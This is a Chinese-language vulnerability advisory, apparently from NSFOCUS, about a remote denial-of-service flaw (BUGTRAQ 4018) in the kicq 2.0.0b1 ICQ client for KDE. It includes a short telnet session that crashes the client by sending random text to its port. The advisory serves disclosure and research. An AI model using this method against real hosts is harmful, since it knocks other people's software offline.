kicq 2.0.0b1远程无效ICQ数据包拒绝服务攻击漏洞

受影响的系统:
KICQ KICQ 2.0.0b1

不受影响系统:

描述:
--------------------------------------------------------------------------------


BUGTRAQ ID: 4018

kicq 2.0.0b1是KDE桌面环境下的ICQ客户端软件。

kicq实现上存在漏洞，远程攻击者可以对此客户端程序进行拒绝服务攻击。

通过向kicq的端口发送一些随机的字符，kicq客户端程序就会崩溃。


<*来源：Rafael San Miguel Carrasco

链接：http://archives.neohapsis.com/archives/bugtraq/2002-01/0400.html
*>

测试程序：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！



Rafael San Miguel Carrasco 提供了如下测试方法：

bash-2.05$ telnet 10.0.0.1 1030
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
garbage
Connection closed by foreign host.



--------------------------------------------------------------------------------
建议:

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

没有合适的临时解决方法。